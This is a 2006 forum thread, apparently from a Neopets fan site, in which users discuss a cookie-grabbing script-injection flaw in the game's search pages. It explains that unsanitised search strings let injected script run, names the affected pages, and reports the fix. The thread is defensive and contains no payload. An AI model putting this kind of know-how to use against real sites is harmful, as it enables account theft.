The All Clear?

[puck]

dolphinling, is adblock working with flash again? for a while i couldn't play games and adblock was the problem.

[stinkyllama]

You are crazy super awesome dolphinling.

Everything you said was perfectly clear and brilliant but I do have a question about the script loading in iframes. Is there a way to prevent any iframe code from being used at all in your browser? (I'm assuming that using such code is the preferred method used by the Evil People since it's less obvious than just sending you to your SDB.)

Thanks!

[dolphinling]

dolphinling, is adblock working with flash again? for a while i couldn't play games and adblock was the problem.

I don't know. It never caused problems for me. This thread on mozillazine seems to have some ideas, though I can't vouch for it.

Is there a way to prevent any iframe code from being used at all in your browser? (I'm assuming that using such code is the preferred method used by the Evil People since it's less obvious than just sending you to your SDB.)

Not that I know of. Frames and iframes are quite common on the web (despite being awful design...) and disabling them would mess up a lot of sites. Besides, there are other ways than iframes of forcing you to the page: they could just redirect you there with javascript.

Last edited by dolphinling on Mon Jan 09, 2006 11:20 am, edited 2 times in total.

[stinkyllama]

Not that I know of. Frames and iframes are quite common on the web (despite being awful design...) and disabling them would mess up a lot of sites. Besides, there are other ways than iframes of forcing you to the page: they could just redirect you there with javascript.

Ah, true. Thanks for the reply though.

Also, if you're looking to add to your list of pages that can have code modified after the "?", I believe the LDP comic is also vulnerable along with any other page with a search function (TP, Auctions, Help, etc.)...

Not cool.

[Arnold]

I dunno if this has anything to do with it but i jsut had a weird experiance in a Shop, was buying a King Kelpbeards Blessing, and they had 4 in the shop, when I went to buy one I clciked it and got the pop up window but I know I pressed cancel yet my money got taken away and i hve one in my items so I tried it again, pressed cancel and it still bought the item so I have two, not much of an issue becasuie I'll sell one but it jsut looked weird I didn't like the look of the shop (didn't have anything weird about it but i jsut had a feeling) Thats why I clciked cancel, but I loggedo ff changed my Password and hopefully i'll be alright but I jsut found it weird

[dolphinling]

Also, if you're looking to add to your list of pages that can have code modified after the "?", I believe the LDP comic is also vulnerable along with any other page with a search function (TP, Auctions, Help, etc.)...

Not cool.

No, it's luckily not quite that bad. Only certain search functions are vunerable: ones that pass the search string through without sanitizing it. If you try it in auctions, the <script> tag is removed; if you try it in the help section, it doesn't even tell you what you searched for in the first place.

I've searched through a large section of the site, and I've only found two that were vunerable. That doesn't mean there aren't any more, though, and if scammers spend even more time looking than me they might find some. I would rate the current threat level at yellow if you've protected yourself with my adblock thing, and red if you haven't.

I'm going to bed now, and I advise everyone to be careful until TNT clears this up.

[Matt]

Cheers very much dolphinling; I'll add this info to the front page so that more people can see it

[Officer 1BDI]

I dunno if this has anything to do with it but i jsut had a weird experiance in a Shop, was buying a King Kelpbeards Blessing, and they had 4 in the shop, when I went to buy one I clciked it and got the pop up window but I know I pressed cancel yet my money got taken away and i hve one in my items so I tried it again, pressed cancel and it still bought the item so I have two

I've been having the same problem since before this whole cg scare broke out. I just thought it was a good ol' fashioned bug.

Thank you for the information, dolphinling. Methinks I'll avoid playing in Neopia for a while.

[Skynetmain]

...

Two questions:
1) Would someone have to have with Neopets knowledge to go after the SDB like described above, or could that just be grabbed in a random attack?

Not quite sure I understand this... The person creating the attack would have to have at least a bit of neopets knowledge, yes. But if they didn't know anything about neopets, why would they be taking your stuff anyway? If that's not what you mean, try restating it?

...

Thank you. You have answered exactly how I thought. It was just a crazy random question asked while half asleep.

2) How long does it take for password requests to get sent out? I just got an e-mail saying I requested one and immediately changed it. I remember requesting one months ago and never getting a reply, but I'm still paranoid.

The good news is this should not in any way request your password from neopets. The bad news is that they would not need to because the cookie grabber would already tell them.

So I am just being paranoid, except if the cg-ed me already, which seems unlikely since it had been many days since my last visit to any user run area and nothing bad has happened to me yet.

Thanks to all who helped me out [/quote]

[ssandgirls]

Dolphinling, Thankyou for your wonderful advice.

I am using IE.. My question is, will that MS critical update protect me from all this?

Many thanks,

SS:)

[dolphinling]

Okay, I'm back awake and have a few things to report

First: people on the neoboards are claiming that they were cookiegrabbed by following a link to trades. I'm looking into it, but haven't found anything yet. They didn't sound like they knew what they were talking about, but it's possible the Evil People found something I haven't. In the meantime, as always, be careful.

Second: I have just got in contact with programmers, and it has been forwarded to the appropriate person. Hopefully this means it will be fixed soon

[everconfused]

ssandgirls, from my limited understanding, no, that update will not have any effect on what's going on. This isn't just an issue of looking at an image (which I think is what that fix was for).

My question? What's the other place that's been found that has this vulnerability? Is it the shop wizard/SSW/auction genie, the search on the sidebar, Help search, etc. ... meaning just any search in general? As in anything that could end with a ? like the SDB searches do.

If so, then for all intents and purposes the only things you could/should do is feed your pets, play some games, go to the bank, your guild and I guess the boards. No shopping unless it's main shops, no going to lookups, petpages, pet descriptions, user shops, searching for things on the wizard/auctions/tp or even via the Help or sidebar.

I would really like to see the site down and all of this taken care of. It just seems that it would be better to try to fix these problems which could (and already has) impact so many people, many completely unaware of it.

This is so disturbing. I know, it's "just" pixels as far as the site. But it could have ramifications beyond the site. Just having someone's email could open a huge can of worms. Please TNT, don't try to sweep this under the rug and pretend it hasn't happened and there is something happening. Take care of it and let people know. I also would love to see the people behind this caught. To me, doing things like this on a game site means they're practicing for bigger things. Better to get them now and maybe stop them from trying to get to our banking sites, things like that.

[dolphinling]

Dolphinling, Thankyou for your wonderful advice.

I am using IE.. My question is, will that MS critical update protect me from all this?

No it will not. That patch is for something much worse that would let anyone take over your computer entirely--you could e.g. have your credit card details stolen. The cookiegrabber thing is neopets specific. You should absolutely absolutely absolutely have that patch if you're on windows, but it's not what's in question here.

My question? What's the other place that's been found that has this vulnerability? Is it the shop wizard/SSW/auction genie, the search on the sidebar, Help search, etc. ... meaning just any search in general? As in anything that could end with a ? like the SDB searches do.

The other place that I know of is the World Challenge game search page. It's not all searches, as most of them have been protected from things like this. The WC search and the SDB are new, though, so I guess they made sure of it in the past, but forgot to with these.

I would really like to see the site down and all of this taken care of. It just seems that it would be better to try to fix these problems which could (and already has) impact so many people, many completely unaware of it.

The site doesn't need to come down to fix this. The fix can go into place without any disturbance at all.

[dolphinling]

It Is Fixed!
The SDB and WC searches are now protected.

There may be others, though, and I expect they'll be doing their own looking to make sure none are missed.

Edit: Oops, double post. heh.

[luv2lindy77]

Thank goodness! Thanks so much for your hard work, dolphinling! I'll be checking back at the forums for updates.